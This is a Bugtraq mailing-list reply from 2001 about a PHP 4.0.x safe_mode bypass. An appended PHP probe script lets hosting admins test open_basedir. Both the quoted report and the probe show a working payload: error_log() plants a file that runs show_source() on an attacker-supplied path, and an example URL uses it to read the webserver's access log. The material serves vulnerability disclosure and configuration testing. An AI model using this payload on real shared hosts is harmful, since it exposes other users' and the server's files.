Bugtraq mailing list archives

Re: php breaks safe mode


From: Laurent Papier <papier () sdv fr>
Date: Mon, 02 Jul 2001 17:02:50 +0200

Joost Pol wrote:

2. PHP Version 4.0.5/4.0.4pl1 SOMETIMES breaks safe_mode.

 2.0 - Description of the problem

  PHP safe_mode has the nice feature of disallowing the opening/reading
  and writing to files that are not owned by the uid that the script
  is owned by.

  Though using some "common sense" it still is possible to open/read
  and write to files that are owned by the uid the webserver is
  running as.

  *notice* assuming that something like suexec is not in place */notice*

  An attacker could upload a simple script that does the following:

  <?
        // Payload written by error_log(): once nobody.php is requested over
        // the web it calls show_source() on a caller-supplied path ($foo
        // arrives via register_globals). The file is created by the webserver
        // uid, so safe_mode's owner check no longer stops it.
        $cmd = '<? show_source($foo); ?>';
        error_log($cmd,3,"/path/to/user/wwwspace/nobody.php");
  ?>

  For example, assuming that the error_log is owned by the webserver it
  could be read using a simple query:

  http://foo.bar/~user/nobody.php?foo=/path/to/webserver/logs/access_log

 2.1 - Impact

  Depends on the setup of the hosting box.

  If suexec or something similar is used, the impact is nil.

  See also 1.1.1/1.1.2

 2.3 - Solution

  Disallow the changing of the error_log location in safe_mode?

  Not really for me to say, the PHP-team will come with something good.

  Notice: just changing the error_log function won't do, you could also
          change the ini setting error_log (or another ini setting
          that has a similar effect).

          These ini settings can be set from a user script since they
          all have PHP_INI_ALL permissions.

          Maybe disallow setting of ini variables in safemode?

I think safe_mode should always be used with the open_basedir directive in
order to limit user filesystem access.
As error_log is limited by open_basedir, suexec is not needed to have a
secure system as long as open_basedir is correctly set.

I see nothing wrong with allowing users to use error_log.
I don't think the PHP team should change the error_log function.

-- 
Laurent Papier - Systems administrator
Sdv Plurimedia - <http://www.sdv.fr>
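The two messages above disagree on whether open_basedir is enough to contain the error_log trick, and neither shows how to check. What follows is an added probe, not code from either poster or from the PHP project: a hosting admin drops it into a customer's webspace and requests it over the web as that customer. It tries both routes from Joost Pol's post (an explicit error_log() destination and the ini_set('error_log') variant) against a path outside open_basedir, then does a control write inside open_basedir and shows the ownership mismatch that defeats safe_mode's uid check. All paths, and the assumption that the vhost has open_basedir set to the customer's directory, are placeholders to adjust.

```php
<?php
// Added example, not code from the original thread.  A probe the hosting
// admin drops into a customer's webspace to see whether safe_mode plus
// open_basedir on this box stop the error_log() trick discussed above.
// Every path below is an assumption; point them at the vhost under test.

$user_space = '/path/to/user/wwwspace';               // assumed open_basedir root
$inside     = $user_space . '/probe-inside.php';      // inside open_basedir
$outside    = '/path/to/webserver/logs/probe.php';    // outside open_basedir
$payload    = "<?php show_source(\$_GET['foo']); ?>"; // same idea as the post

header('Content-Type: text/plain');
ini_set('display_errors', '0');
error_reporting(E_ALL);
printf("safe_mode=%s  open_basedir=%s\n",
       ini_get('safe_mode') ? 'On' : 'Off',
       ini_get('open_basedir') === '' ? '(unset)' : ini_get('open_basedir'));

// Variant 1: explicit destination, exactly what the quoted post does.
$explicit = @error_log($payload, 3, $outside);
printf("error_log(payload, 3, outside): %s\n",
       $explicit ? 'returned true, file written: BYPASS' : 'returned false: blocked');

// Variant 2: the ini route Joost Pol warns about.  error_log is PHP_INI_ALL,
// so the script moves the log file and then raises an error that gets logged.
$saved_log = ini_get('error_log');
ini_set('log_errors', '1');
ini_set('error_log', $outside);
trigger_error($payload, E_USER_WARNING);
ini_set('error_log', $saved_log);
// file_exists() is itself subject to open_basedir, so "not visible" means
// "could not check from here"; confirm with ls -l from a shell on the box.
printf("ini_set('error_log') route: %s\n",
       @file_exists($outside) ? 'file visible: BYPASS' : 'not visible from this script');

// Control: inside open_basedir the write should succeed, and the file it
// produces belongs to the webserver uid rather than to the customer.  That
// ownership is what lets the planted file pass safe_mode's uid check later.
if (@error_log($payload, 3, $inside)) {
    printf("inside open_basedir: written, file uid=%d, script uid=%d\n",
           fileowner($inside), getmyuid());
    @unlink($inside);
}
@unlink($outside); // best-effort cleanup; also refused by open_basedir if it holds
```

Run it through the webserver, not the php command-line binary, since the CLI reads its own php.ini and never sees per-vhost settings. For the test to mean anything, open_basedir must be set with php_admin_value in the vhost rather than php_value or .htaccess, so the customer's own scripts cannot loosen it. A "BYPASS" on either outside-path line, or a differing file uid and script uid on the control line, is the condition the thread is arguing about; with suexec or a similar per-user execution model the control line shows equal uids and the planted file gains nothing.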

